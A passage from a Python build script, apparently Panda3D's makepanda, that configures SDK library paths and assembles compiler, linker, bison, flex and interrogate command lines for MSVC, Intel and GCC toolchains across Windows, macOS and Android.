# Sheesh, Autodesk really can't make up their mind
# regarding the location of the Maya devkit on OS X.
if (os.path.isdir(SDK[pkg] + "/Maya.app/Contents/lib")):
LibDirectory(pkg, SDK[pkg] + "/Maya.app/Contents/lib")
if (os.path.isdir(SDK[pkg] + "/Maya.app/Contents/MacOS")):
LibDirectory(pkg, SDK[pkg] + "/Maya.app/Contents/MacOS")
if (os.path.isdir(SDK[pkg] + "/lib")):
LibDirectory(pkg, SDK[pkg] + "/lib")
if (os.path.isdir(SDK[pkg] + "/Maya.app/Contents/include/maya")):
IncDirectory(pkg, SDK[pkg] + "/Maya.app/Contents/include")
if (os.path.isdir(SDK[pkg] + "/devkit/include/maya")):
IncDirectory(pkg, SDK[pkg] + "/devkit/include")
if (os.path.isdir(SDK[pkg] + "/include/maya")):
IncDirectory(pkg, SDK[pkg] + "/include")
else:
LibDirectory(pkg, SDK[pkg] + "/lib")
IncDirectory(pkg, SDK[pkg] + "/include")
DefSymbol(pkg, "MAYAVERSION", pkg)
if GetTarget() == 'darwin':
LibName("ALWAYS", "-framework AppKit")
if (PkgSkip("OPENCV")==0):
LibName("OPENCV", "-framework QuickTime")
LibName("AGL", "-framework AGL")
LibName("CARBON", "-framework Carbon")
LibName("COCOA", "-framework Cocoa")
# Fix for a bug in OSX Leopard:
LibName("GL", "-dylib_file /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib:/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib")
if GetTarget() == 'android':
LibName("ALWAYS", '-llog')
LibName("ANDROID", '-landroid')
LibName("JNIGRAPHICS", '-ljnigraphics')
for pkg in MAYAVERSIONS:
if (PkgSkip(pkg)==0 and (pkg in SDK)):
if GetTarget() == 'darwin':
LibName(pkg, "-Wl,-rpath," + SDK[pkg] + "/Maya.app/Contents/MacOS")
else:
LibName(pkg, "-Wl,-rpath," + SDK[pkg] + "/lib")
LibName(pkg, "-lOpenMaya")
LibName(pkg, "-lOpenMayaAnim")
LibName(pkg, "-lAnimSlice")
LibName(pkg, "-lDeformSlice")
LibName(pkg, "-lModifiers")
LibName(pkg, "-lDynSlice")
LibName(pkg, "-lKinSlice")
LibName(pkg, "-lModelSlice")
LibName(pkg, "-lNurbsSlice")
LibName(pkg, "-lPolySlice")
LibName(pkg, "-lProjectSlice")
LibName(pkg, "-lImage")
LibName(pkg, "-lShared")
LibName(pkg, "-lTranslators")
LibName(pkg, "-lDataModel")
LibName(pkg, "-lRenderModel")
LibName(pkg, "-lNurbsEngine")
LibName(pkg, "-lDependEngine")
LibName(pkg, "-lCommandEngine")
LibName(pkg, "-lFoundation")
LibName(pkg, "-lIMFbase")
if GetTarget() != 'darwin':
LibName(pkg, "-lOpenMayalib")
else:
LibName(pkg, "-dylib_file /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib:/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib")
if (PkgSkip("PHYSX")==0):
IncDirectory("PHYSX", SDK["PHYSX"] + "/Physics/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/PhysXLoader/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/NxCharacter/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/NxExtensions/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Foundation/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Cooking/include")
LibDirectory("PHYSX", SDK["PHYSXLIBS"])
if (GetHost() == "darwin"):
LibName("PHYSX", SDK["PHYSXLIBS"] + "/osxstatic/PhysXCooking.a")
LibName("PHYSX", SDK["PHYSXLIBS"] + "/osxstatic/PhysXCore.a")
else:
LibName("PHYSX", "-lPhysXLoader")
LibName("PHYSX", "-lNxCharacter")
DefSymbol("WITHINPANDA", "WITHIN_PANDA", "1")
if GetLinkAllStatic():
DefSymbol("ALWAYS", "LINK_ALL_STATIC")
if GetTarget() == 'android':
DefSymbol("ALWAYS", "ANDROID")
if not PkgSkip("EIGEN"):
if GetOptimize() >= 3:
if COMPILER == "MSVC":
# Squeeze out a bit more performance on MSVC builds...
# Only do this if EIGEN_NO_DEBUG is also set, otherwise it
# will turn them into runtime assertions.
DefSymbol("ALWAYS", "EIGEN_NO_STATIC_ASSERT")
########################################################################
##
## Give a Status Report on Command-Line Options
##
########################################################################
def printStatus(header,warnings):
if GetVerbose():
print("")
print("-------------------------------------------------------------------")
print(header)
tkeep = ""
tomit = ""
for x in PkgListGet():
if PkgSkip(x):
tomit = tomit + x + " "
else:
tkeep = tkeep + x + " "
if RTDIST:
print("Makepanda: Runtime distribution build")
elif RUNTIME:
print("Makepanda: Runtime build")
else:
print("Makepanda: Regular build")
print("Makepanda: Compiler: %s" % (COMPILER))
print("Makepanda: Optimize: %d" % (GetOptimize()))
print("Makepanda: Keep Pkg: %s" % (tkeep))
print("Makepanda: Omit Pkg: %s" % (tomit))
if GENMAN:
print("Makepanda: Generate API reference manual")
else:
print("Makepanda: Don't generate API reference manual")
if GetHost() == "windows" and not RTDIST:
if INSTALLER:
print("Makepanda: Build installer, using %s" % (COMPRESSOR))
else:
print("Makepanda: Don't build installer")
print("Makepanda: Version ID: %s" % (VERSION))
for x in warnings:
print("Makepanda: %s" % (x))
print("-------------------------------------------------------------------")
print("")
sys.stdout.flush()
########################################################################
##
## BracketNameWithQuotes
##
########################################################################
def BracketNameWithQuotes(name):
# Workaround for OSX bug - compiler doesn't like those flags quoted.
if (name.startswith("-framework")): return name
if (name.startswith("-dylib_file")): return name
# Don't add quotes when it's not necessary.
if " " not in name: return name
# Account for quoted name (leave as is) but quote everything else (e.g., to protect spaces within paths from improper parsing)
if (name.startswith('"') and name.endswith('"')): return name
else: return '"' + name + '"'
########################################################################
##
## CompileCxx
##
########################################################################
def CompileCxx(obj,src,opts):
ipath = GetListOption(opts, "DIR:")
optlevel = GetOptimizeOption(opts)
if (COMPILER=="MSVC"):
if not BOOUSEINTELCOMPILER:
cmd = "cl "
if GetTargetArch() == 'x64':
cmd += "/favor:blend "
cmd += "/wd4996 /wd4275 /wd4273 "
# We still target Windows XP.
cmd += "/DWINVER=0x501 "
# Work around a WinXP/2003 bug when using VS 2015+.
if SDK.get("VISUALSTUDIO_VERSION") >= (14,0):
cmd += "/Zc:threadSafeInit- "
cmd += "/Fo" + obj + " /nologo /c"
if GetTargetArch() != 'x64' and (not PkgSkip("SSE2") or 'SSE2' in opts):
cmd += " /arch:SSE2"
for x in ipath: cmd += " /I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += " /I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts): cmd += " /D" + var + "=" + val
if (opts.count('MSFORSCOPE')): cmd += ' /Zc:forScope-'
if (optlevel==1): cmd += " /MDd /Zi /RTCs /GS"
if (optlevel==2): cmd += " /MDd /Zi"
if (optlevel==3): cmd += " /MD /Zi /GS- /O2 /Ob2 /Oi /Ot /fp:fast"
if (optlevel==4):
cmd += " /MD /Zi /GS- /Ox /Ob2 /Oi /Ot /fp:fast /DFORCE_INLINING /DNDEBUG /GL"
cmd += " /Oy /Zp16" # jean-claude add /Zp16 insures correct static alignment for SSEx
cmd += " /Fd" + os.path.splitext(obj)[0] + ".pdb"
building = GetValueOption(opts, "BUILDING:")
if (building):
cmd += " /DBUILDING_" + building
if ("BIGOBJ" in opts) or GetTargetArch() == 'x64':
cmd += " /bigobj"
cmd += " /Zm300 /DWIN32_VC /DWIN32"
if 'EXCEPTIONS' in opts:
cmd += " /EHsc"
else:
cmd += " /D_HAS_EXCEPTIONS=0"
if 'RTTI' not in opts:
cmd += " /GR-"
if GetTargetArch() == 'x64':
cmd += " /DWIN64_VC /DWIN64"
if WINDOWS_SDK.startswith('7.') and MSVC_VERSION > (10,):
# To preserve Windows XP compatibility.
cmd += " /D_USING_V110_SDK71_"
cmd += " /W3 " + BracketNameWithQuotes(src)
oscmd(cmd)
else:
cmd = "icl "
if GetTargetArch() == 'x64':
cmd += "/favor:blend "
cmd += "/wd4996 /wd4275 /wd4267 /wd4101 /wd4273 "
cmd += "/DWINVER=0x501 "
cmd += "/Fo" + obj + " /c"
for x in ipath: cmd += " /I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += " /I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts): cmd += " /D" + var + "=" + val
if (opts.count('MSFORSCOPE')): cmd += ' /Zc:forScope-'
if (optlevel==1): cmd += " /MDd /Zi /RTCs /GS"
if (optlevel==2): cmd += " /MDd /Zi /arch:SSE3"
# core changes from jean-claude (dec 2011)
# ----------------------------------------
# performance will be seeked at level 3 & 4
# -----------------------------------------
if (optlevel==3):
cmd += " /MD /Zi /O2 /Oi /Ot /arch:SSE3"
cmd += " /Ob0"
cmd += " /Qipo-" # beware of IPO !!!
## Lesson learned: Don't use /GL flag -> end result is MESSY
## ----------------------------------------------------------------
if (optlevel==4):
cmd += " /MD /Zi /O3 /Oi /Ot /Ob0 /Yc /DNDEBUG" # /Ob0 a ete rajoute en cours de route a 47%
cmd += " /Qipo" # optimization multi file
# for 3 & 4 optimization levels
# -----------------------------
if (optlevel>=3):
cmd += " /fp:fast=2"
cmd += " /Qftz"
cmd += " /Qfp-speculation:fast"
cmd += " /Qopt-matmul" # needs /O2 or /O3
cmd += " /Qprec-div-"
cmd += " /Qsimd"
cmd += " /QxHost" # compile for target host; Compiling for distribs should probably strictly enforce /arch:..
cmd += " /Quse-intel-optimized-headers" # use intel optimized headers
cmd += " /Qparallel" # enable parallelization
cmd += " /Qvc10" # for Microsoft Visual C++ 2010
## PCH files coexistence: the /Qpchi option causes the Intel C++ Compiler to name its
## PCH files with a .pchi filename suffix and reduce build time.
## The /Qpchi option is on by default but interferes with Microsoft libs; so use /Qpchi- to turn it off.
## I need to have a deeper look at this since the compile time is quite influenced by this setting !!!
cmd += " /Qpchi-" # keep it this way!
## Inlining seems to be an issue here ! (the linker doesn't find necessary info later on)
## ------------------------------------
## so don't use cmd += " /DFORCE_INLINING" (need to check why with Panda developpers!)
## Inline expansion /Ob1 : Allow functions marked inline to be inlined.
## Inline any /Ob2 : Inline functions deemed appropriate by compiler.
## Ctor displacement /vd0 : Disable constructor displacement.
## Choose this option only if no class constructors or destructors call virtual functions.
## Use /vd1 (default) to enable. Alternate: #pragma vtordisp
## Best case ptrs /vmb : Use best case "pointer to class member" representation.
## Use this option if you always define a class before you declare a pointer to a member of the class.
## The compiler will issue an error if it encounters a pointer declaration before the class is defined.
## Alternate: #pragma pointers_to_members
cmd += " /Fd" + os.path.splitext(obj)[0] + ".pdb"
building = GetValueOption(opts, "BUILDING:")
if (building): cmd += " /DBUILDING_" + building
if ("BIGOBJ" in opts) or GetTargetArch() == 'x64':
cmd += " /bigobj"
# level of warnings and optimization reports
if GetVerbose():
cmd += " /W3 " # or /W4 or /Wall
cmd += " /Qopt-report:2 /Qopt-report-phase:hlo /Qopt-report-phase:hpo" # some optimization reports
else:
cmd += " /W1 "
cmd += " /EHa /Zm300 /DWIN32_VC /DWIN32"
if GetTargetArch() == 'x64':
cmd += " /DWIN64_VC /DWIN64"
cmd += " " + BracketNameWithQuotes(src)
oscmd(cmd)
if (COMPILER=="GCC"):
if (src.endswith(".c")): cmd = GetCC() +' -fPIC -c -o ' + obj
else: cmd = GetCXX()+' -std=gnu++11 -ftemplate-depth-70 -fPIC -c -o ' + obj
for (opt, dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += ' -I' + BracketNameWithQuotes(dir)
for (opt, dir) in FRAMEWORKDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += ' -F' + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts): cmd += ' -D' + var + '=' + val
for x in ipath: cmd += ' -I' + x
if not GetLinkAllStatic() and 'NOHIDDEN' not in opts:
cmd += ' -fvisibility=hidden'
# Mac-specific flags.
if GetTarget() == "darwin":
cmd += " -Wno-deprecated-declarations"
if OSXTARGET is not None:
cmd += " -isysroot " + SDK["MACOSX"]
cmd += " -mmacosx-version-min=%d.%d" % (OSXTARGET)
for arch in OSX_ARCHS:
if 'NOARCH:' + arch.upper() not in opts:
cmd += " -arch %s" % arch
if "SYSROOT" in SDK:
if GetTarget() != "android":
cmd += ' --sysroot=%s' % (SDK["SYSROOT"])
else:
ndk_dir = SDK["ANDROID_NDK"].replace('\\', '/')
cmd += ' -isystem %s/sysroot/usr/include' % (ndk_dir)
cmd += ' -isystem %s/sysroot/usr/include/%s' % (ndk_dir, SDK["ANDROID_TRIPLE"])
cmd += ' -no-canonical-prefixes'
# Android-specific flags.
arch = GetTargetArch()
if GetTarget() == "android":
# Most of the specific optimization flags here were
# just copied from the default Android Makefiles.
if "ANDROID_API" in SDK:
cmd += ' -D__ANDROID_API__=' + str(SDK["ANDROID_API"])
if "ANDROID_GCC_TOOLCHAIN" in SDK:
cmd += ' -gcc-toolchain ' + SDK["ANDROID_GCC_TOOLCHAIN"].replace('\\', '/')
cmd += ' -ffunction-sections -funwind-tables'
if arch == 'armv7a':
cmd += ' -target armv7-none-linux-androideabi'
cmd += ' -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16'
cmd += ' -fno-integrated-as'
elif arch == 'arm':
cmd += ' -target armv5te-none-linux-androideabi'
cmd += ' -march=armv5te -mtune=xscale -msoft-float'
cmd += ' -fno-integrated-as'
elif arch == 'aarch64':
cmd += ' -target aarch64-none-linux-android'
elif arch == 'mips':
cmd += ' -target mipsel-none-linux-android'
cmd += ' -mips32'
elif arch == 'mips64':
cmd += ' -target mips64el-none-linux-android'
cmd += ' -fintegrated-as'
elif arch == 'x86':
cmd += ' -target i686-none-linux-android'
cmd += ' -march=i686 -mtune=intel -mssse3 -mfpmath=sse -m32'
cmd += ' -mstackrealign'
elif arch == 'x86_64':
cmd += ' -target x86_64-none-linux-android'
cmd += ' -march=x86-64 -msse4.2 -mpopcnt -m64 -mtune=intel'
cmd += " -Wa,--noexecstack"
# Do we want thumb or arm instructions?
if arch.startswith('arm'):
if optlevel >= 3:
cmd += ' -mthumb'
else:
cmd += ' -marm'
# Enable SIMD instructions if requested
if arch.startswith('arm') and PkgSkip("NEON") == 0:
cmd += ' -mfpu=neon'
else:
cmd += " -pthread"
if not src.endswith(".c"):
# We don't use exceptions for most modules.
if 'EXCEPTIONS' in opts:
cmd += " -fexceptions"
else:
cmd += " -fno-exceptions"
if src.endswith(".mm"):
# Work around Apple compiler bug.
cmd += " -U__EXCEPTIONS"
if 'RTTI' not in opts:
# We always disable RTTI on Android for memory usage reasons.
if optlevel >= 4 or GetTarget() == "android":
cmd += " -fno-rtti"
if ('SSE2' in opts or not PkgSkip("SSE2")) and not arch.startswith("arm") and arch != 'aarch64':
cmd += " -msse2"
# Needed by both Python, Panda, Eigen, all of which break aliasing rules.
cmd += " -fno-strict-aliasing"
if optlevel >= 3:
cmd += " -ffast-math -fno-stack-protector"
if optlevel == 3:
# Fast math is nice, but we'd like to see NaN in dev builds.
cmd += " -fno-finite-math-only"
if (optlevel==1): cmd += " -ggdb -D_DEBUG"
if (optlevel==2): cmd += " -O1 -D_DEBUG"
if (optlevel==3): cmd += " -O2"
if (optlevel==4): cmd += " -O3 -DNDEBUG"
if src.endswith(".c"):
cmd += ' ' + CFLAGS
else:
cmd += ' ' + CXXFLAGS
cmd = cmd.rstrip()
building = GetValueOption(opts, "BUILDING:")
if (building): cmd += " -DBUILDING_" + building
cmd += ' ' + BracketNameWithQuotes(src)
oscmd(cmd)
########################################################################
##
## CompileBison
##
########################################################################
def CompileBison(wobj, wsrc, opts):
ifile = os.path.basename(wsrc)
wdsth = GetOutputDir()+"/include/" + ifile[:-4] + ".h"
wdstc = GetOutputDir()+"/tmp/" + ifile + ".cxx"
pre = GetValueOption(opts, "BISONPREFIX_")
bison = GetBison()
if bison is None:
# We don't have bison. See if there is a prebuilt file.
base, ext = os.path.splitext(wsrc)
if os.path.isfile(base + '.h.prebuilt') and \
os.path.isfile(base + '.cxx.prebuilt'):
CopyFile(wdstc, base + '.cxx.prebuilt')
CopyFile(wdsth, base + '.h.prebuilt')
else:
exit('Could not find bison!')
else:
oscmd(bison + ' -y -d -o'+GetOutputDir()+'/tmp/'+ifile+'.c -p '+pre+' '+wsrc)
CopyFile(wdstc, GetOutputDir()+"/tmp/"+ifile+".c")
CopyFile(wdsth, GetOutputDir()+"/tmp/"+ifile+".h")
# Finally, compile the generated source file.
CompileCxx(wobj, wdstc, opts + ["FLEX"])
########################################################################
##
## CompileFlex
##
########################################################################
def CompileFlex(wobj,wsrc,opts):
ifile = os.path.basename(wsrc)
wdst = GetOutputDir()+"/tmp/"+ifile+".cxx"
pre = GetValueOption(opts, "BISONPREFIX_")
dashi = opts.count("FLEXDASHI")
flex = GetFlex()
if flex is None:
# We don't have flex. See if there is a prebuilt file.
base, ext = os.path.splitext(wsrc)
if os.path.isfile(base + '.cxx.prebuilt'):
CopyFile(wdst, base + '.cxx.prebuilt')
else:
exit('Could not find flex!')
else:
if (dashi):
oscmd(flex + " -i -P" + pre + " -o"+wdst+" "+wsrc)
else:
oscmd(flex + " -P" + pre + " -o"+wdst+" "+wsrc)
# Finally, compile the generated source file.
CompileCxx(wobj,wdst,opts)
########################################################################
##
## CompileIgate
##
########################################################################
def CompileIgate(woutd,wsrc,opts):
outbase = os.path.basename(woutd)[:-3]
woutc = GetOutputDir()+"/tmp/"+outbase+"_igate.cxx"
wobj = FindLocation(outbase + "_igate.obj", [])
srcdir = GetValueOption(opts, "SRCDIR:")
module = GetValueOption(opts, "IMOD:")
library = GetValueOption(opts, "ILIB:")
ipath = GetListOption(opts, "DIR:")
if (PkgSkip("PYTHON")):
WriteFile(woutc, "")
WriteFile(woutd, "")
ConditionalWriteFile(woutd, "")
return (wobj, woutc, opts)
if not CrossCompiling():
# If we're compiling for this platform, we can use the one we've built.
cmd = os.path.join(GetOutputDir(), 'bin', 'interrogate')
else:
# Assume that interrogate is on the PATH somewhere.
cmd = 'interrogate'
if GetVerbose():
cmd += ' -v'
cmd += ' -srcdir %s -I%s' % (srcdir, srcdir)
cmd += ' -DCPPPARSER -D__STDC__=1 -D__cplusplus=201103L'
if (COMPILER=="MSVC"):
cmd += ' -DWIN32_VC -DWIN32 -D_WIN32'
if GetTargetArch() == 'x64':
cmd += ' -DWIN64_VC -DWIN64 -D_WIN64 -D_M_X64 -D_M_AMD64'
else:
cmd += ' -D_M_IX86'
# NOTE: this 1600 value is the version number for VC2010.
cmd += ' -D_MSC_VER=1600 -D"__declspec(param)=" -D__cdecl -D_near -D_far -D__near -D__far -D__stdcall'
if (COMPILER=="GCC"):
cmd += ' -D__attribute__\(x\)='
target_arch = GetTargetArch()
if target_arch in ("x86_64", "amd64"):
cmd += ' -D_LP64'
elif target_arch == 'aarch64':
cmd += ' -D_LP64 -D__LP64__ -D__aarch64__'
else:
cmd += ' -D__i386__'
target = GetTarget()
if target == 'darwin':
cmd += ' -D__APPLE__'
elif target == 'android':
cmd += ' -D__ANDROID__'
optlevel = GetOptimizeOption(opts)
if (optlevel==1): cmd += ' -D_DEBUG'
if (optlevel==2): cmd += ' -D_DEBUG'
if (optlevel==3): pass
if (optlevel==4): cmd += ' -DNDEBUG'
cmd += ' -oc ' + woutc + ' -od ' + woutd
cmd += ' -fnames -string -refcount -assert -python-native'
cmd += ' -S' + GetOutputDir() + '/include/parser-inc'
# Add -I, -S and -D flags
for x in ipath:
cmd += ' -I' + BracketNameWithQuotes(x)
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' -S' + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' -D' + var + '=' + val
#building = GetValueOption(opts, "BUILDING:")
#if (building): cmd += " -DBUILDING_"+building
cmd += ' -module ' + module + ' -library ' + library
for x in wsrc:
if (x.startswith("/")):
cmd += ' ' + BracketNameWithQuotes(x)
else:
cmd += ' ' + BracketNameWithQuotes(os.path.basename(x))
oscmd(cmd)
return (wobj, woutc, opts)
########################################################################
##
## CompileImod
##
########################################################################
def CompileImod(wobj, wsrc, opts):
module = GetValueOption(opts, "IMOD:")
library = GetValueOption(opts, "ILIB:")
if (COMPILER=="MSVC"):
woutc = wobj[:-4]+".cxx"
if (COMPILER=="GCC"):
woutc = wobj[:-2]+".cxx"
if (PkgSkip("PYTHON")):
WriteFile(woutc, "")
CompileCxx(wobj, woutc, opts)
return
if not CrossCompiling():
# If we're compiling for this platform, we can use the one we've built.
cmd = os.path.join(GetOutputDir(), 'bin', 'interrogate_module')
else:
# Assume that interrogate_module is on the PATH somewhere.
cmd = 'interrogate_module'
cmd += ' -oc ' + woutc + ' -module ' + module + ' -library ' + library + ' -python-native'
importmod = GetValueOption(opts, "IMPORT:")
if importmod:
cmd += ' -import ' + importmod
for x in wsrc: cmd += ' ' + BracketNameWithQuotes(x)
oscmd(cmd)
CompileCxx(wobj,woutc,opts)
return
########################################################################
##
## CompileLib
##
########################################################################
def CompileLib(lib, obj, opts):
if (COMPILER=="MSVC"):
if not BOOUSEINTELCOMPILER:
#Use MSVC Linker
cmd = 'link /lib /nologo'
if GetOptimizeOption(opts) == 4:
cmd += " /LTCG"
if HasTargetArch():
cmd += " /MACHINE:" + GetTargetArch().upper()
cmd += ' /OUT:' + BracketNameWithQuotes(lib)
for x in obj:
if not x.endswith('.lib'):
cmd += ' ' + BracketNameWithQuotes(x)
oscmd(cmd)
else:
# Choose Intel linker; from Jean-Claude
cmd = 'xilink /verbose:lib /lib '
if HasTargetArch():
cmd += " /MACHINE:" + GetTargetArch().upper()
cmd += ' /OUT:' + BracketNameWithQuotes(lib)
for x in obj: cmd += ' ' + BracketNameWithQuotes(x)
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\ipp\lib\ia32"'
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\TBB\Lib\ia32\vc10"'
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\compiler\lib\ia32"'
oscmd(cmd)
if (COMPILER=="GCC"):
if GetTarget() == 'darwin':
cmd = 'libtool -static -o ' + BracketNameWithQuotes(lib)
else:
cmd = GetAR() + ' cru ' + BracketNameWithQuotes(lib)
for x in obj:
cmd += ' ' + BracketNameWithQuotes(x)
oscmd(cmd)
oscmd(GetRanlib() + ' ' + BracketNameWithQuotes(lib))
########################################################################
##
## CompileLink
##
########################################################################
def CompileLink(dll, obj, opts):
if (COMPILER=="MSVC"):
if not BOOUSEINTELCOMPILER:
cmd = "link /nologo "
if HasTargetArch():
cmd += " /MACHINE:" + GetTargetArch().upper()
if ("MFC" not in opts):
cmd += " /NOD:MFC90.LIB /NOD:MFC80.LIB /NOD:LIBCMT"
cmd += " /NOD:LIBCI.LIB /DEBUG"
cmd += " /nod:libc /nod:libcmtd /nod:atlthunk /nod:atls /nod:atlsd"
if (GetOrigExt(dll) != ".exe"): cmd += " /DLL"
optlevel = GetOptimizeOption(opts)
if (optlevel==1): cmd += " /MAP /MAPINFO:EXPORTS /NOD:MSVCRT.LIB /NOD:MSVCPRT.LIB /NOD:MSVCIRT.LIB"
if (optlevel==2): cmd += " /MAP:NUL /NOD:MSVCRT.LIB /NOD:MSVCPRT.LIB /NOD:MSVCIRT.LIB"
if (optlevel==3): cmd += " /MAP:NUL /NOD:MSVCRTD.LIB /NOD:MSVCPRTD.LIB /NOD:MSVCIRTD.LIB"
if (optlevel==4): cmd += " /MAP:NUL /LTCG /NOD:MSVCRTD.LIB /NOD:MSVCPRTD.LIB /NOD:MSVCIRTD.LIB"
if ("MFC" in opts):
if (optlevel<=2): cmd += " /NOD:MSVCRTD.LIB mfcs100d.lib MSVCRTD.lib"
else: cmd += " /NOD:MSVCRT.LIB mfcs100.lib MSVCRT.lib"
cmd += " /FIXED:NO /OPT:REF /STACK:4194304 /INCREMENTAL:NO "
cmd += ' /OUT:' + BracketNameWithQuotes(dll)
if not PkgSkip("PYTHON"):
# If we're building without Python, don't pick it up implicitly.
if "PYTHON" not in opts:
pythonv = SDK["PYTHONVERSION"].replace('.', '')
if optlevel <= 2:
cmd += ' /NOD:{}d.lib'.format(pythonv)
else:
cmd += ' /NOD:{}.lib'.format(pythonv)
# Yes, we know we are importing "locally defined symbols".
for x in obj:
if x.endswith('libp3pystub.lib'):
cmd += ' /ignore:4049,4217'
break
# Set the subsystem. Specify that we want to target Windows XP.
subsystem = GetValueOption(opts, "SUBSYSTEM:") or "CONSOLE"
cmd += " /SUBSYSTEM:" + subsystem
if GetTargetArch() == 'x64':
cmd += ",5.02"
else:
cmd += ",5.01"
if dll.endswith(".dll") or dll.endswith(".pyd"):
cmd += ' /IMPLIB:' + GetOutputDir() + '/lib/' + os.path.splitext(os.path.basename(dll))[0] + ".lib"
for (opt, dir) in LIBDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' /LIBPATH:' + BracketNameWithQuotes(dir)
for x in obj:
if x.endswith(".dll") or x.endswith(".pyd"):
cmd += ' ' + GetOutputDir() + '/lib/' + os.path.splitext(os.path.basename(x))[0] + ".lib"
elif x.endswith(".lib"):
dname = os.path.splitext(os.path.basename(x))[0] + ".dll"
if (GetOrigExt(x) != ".ilb" and os.path.exists(GetOutputDir()+"/bin/" + dname)):
exit("Error: in makepanda, specify "+dname+", not "+x)
cmd += ' ' + BracketNameWithQuotes(x)
elif x.endswith(".def"):
cmd += ' /DEF:' + BracketNameWithQuotes(x)
elif x.endswith(".dat"):
pass
else:
cmd += ' ' + BracketNameWithQuotes(x)
if (GetOrigExt(dll)==".exe" and "NOICON" not in opts):
cmd += " " + GetOutputDir() + "/tmp/pandaIcon.res"
for (opt, name) in LIBNAMES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " " + BracketNameWithQuotes(name)
oscmd(cmd)
else:
cmd = "xilink"
if GetVerbose(): cmd += " /verbose:lib"
if HasTargetArch():
cmd += " /MACHINE:" + GetTargetArch().upper()
if ("MFC" not in opts):
cmd += " /NOD:MFC90.LIB /NOD:MFC80.LIB /NOD:LIBCMT"
cmd += " /NOD:LIBCI.LIB /DEBUG"
cmd += " /nod:libc /nod:libcmtd /nod:atlthunk /nod:atls"
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\ipp\lib\ia32"'
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\TBB\Lib\ia32\vc10"'
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\compiler\lib\ia32"'
if (GetOrigExt(dll) != ".exe"): cmd += " /DLL"
optlevel = GetOptimizeOption(opts)
if (optlevel==1): cmd += " /MAP /MAPINFO:EXPORTS /NOD:MSVCRT.LIB /NOD:MSVCPRT.LIB /NOD:MSVCIRT.LIB"
if (optlevel==2): cmd += " /MAP:NUL /NOD:MSVCRT.LIB /NOD:MSVCPRT.LIB /NOD:MSVCIRT.LIB"
if (optlevel==3): cmd += " /MAP:NUL /NOD:MSVCRTD.LIB /NOD:MSVCPRTD.LIB /NOD:MSVCIRTD.LIB"
if (optlevel==4): cmd += " /MAP:NUL /LTCG /NOD:MSVCRTD.LIB /NOD:MSVCPRTD.LIB /NOD:MSVCIRTD.LIB"
if ("MFC" in opts):
if (optlevel<=2): cmd += " /NOD:MSVCRTD.LIB mfcs100d.lib MSVCRTD.lib"
else: cmd += " /NOD:MSVCRT.LIB mfcs100.lib MSVCRT.lib"
cmd += " /FIXED:NO /OPT:REF /STACK:4194304 /INCREMENTAL:NO "
cmd += ' /OUT:' + BracketNameWithQuotes(dll)
subsystem = GetValueOption(opts, "SUBSYSTEM:")
if subsystem:
cmd += " /SUBSYSTEM:" + subsystem
if dll.endswith(".dll"):
cmd += ' /IMPLIB:' + GetOutputDir() + '/lib/' + os.path.splitext(os.path.basename(dll))[0] + ".lib"
for (opt, dir) in LIBDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' /LIBPATH:' + BracketNameWithQuotes(dir)
for x in obj:
if x.endswith(".dll") or x.endswith(".pyd"):
cmd += ' ' + GetOutputDir() + '/lib/' + os.path.splitext(os.path.basename(x))[0] + ".lib"
elif x.endswith(".lib"):
dname = os.path.splitext(dll)[0]+".dll"
if (GetOrigExt(x) != ".ilb" and os.path.exists(GetOutputDir()+"/bin/" + os.path.splitext(os.path.basename(x))[0] + ".dll")):
exit("Error: in makepanda, specify "+dname+", not "+x)
cmd += ' ' + BracketNameWithQuotes(x)
elif x.endswith(".def"):
cmd += ' /DEF:' + BracketNameWithQuotes(x)
elif x.endswith(".dat"):
pass
else:
cmd += ' ' + BracketNameWithQuotes(x)
if (GetOrigExt(dll)==".exe" and "NOICON" not in opts):
cmd += " " + GetOutputDir() + "/tmp/pandaIcon.res"
for (opt, name) in LIBNAMES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " " + BracketNameWithQuotes(name)
oscmd(cmd)
if COMPILER == "GCC":
cxx = GetCXX()
if GetOrigExt(dll) == ".exe":
cmd = cxx + ' -o ' + dll + ' -L' + GetOutputDir() + '/lib -L' + GetOutputDir() + '/tmp'
if GetTarget() == "android":
# Necessary to work around an issue with libandroid depending on vendor libraries
cmd += ' -Wl,--allow-shlib-undefined'
else:
if (GetTarget() == "darwin"):
cmd = cxx + ' -undefined dynamic_lookup'
if ("BUNDLE" in opts or GetOrigExt(dll) == ".pyd"):
